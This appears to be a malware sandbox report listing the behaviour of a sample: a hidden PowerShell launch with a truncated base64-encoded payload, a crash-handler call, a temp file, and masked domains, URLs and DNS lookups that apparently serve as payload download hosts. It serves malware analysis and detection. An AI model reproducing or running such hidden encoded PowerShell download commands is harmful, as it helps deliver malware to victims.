Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABBAHoAeQB0AGoAaAB6AGcAYQB1AG0AaQBnAD0AJwBOAHYAeABkAHgAZwBjAGMAYgBuAGcAJwA7ACQATgBuAHkAagB0AGgAYwByAHoAagBvAHkAdgAgAD0AIAAnADkAMwA3ACcAOwAkAEkAaQBxAHMAZgBwAHMAbQA9ACcAUgBvAGcAeAB...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1516
- %TEMP%\697886.cvr
- 'ah#.#rbdev.com':80
- 'e-##ow.be':80
- 'qw##o.com':443
- http://ah#.#rbdev.com/wp-admin/qp0/
- http://e-##ow.be/verde/in6k/
- 'qw##o.com':443
- DNS ASK ah#.#rbdev.com
- DNS ASK e-##ow.be
- DNS ASK ma#####centpakistan.com
- DNS ASK qw##o.com
- DNS ASK si###uposo.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABBAHoAeQB0AGoAaAB6AGcAYQB1AG0AaQBnAD0AJwBOAHYAeABkAHgAZwBjAGMAYgBuAGcAJwA7ACQATgBuAHkAagB0AGgAYwByAHoAagBvAHkAdgAgAD0AIAAnADkAMwA3ACcAOwAkAEkAaQBxAHMAZgBwAHMAbQA9ACcAUgBvAGcAeAB...' (with hidden window)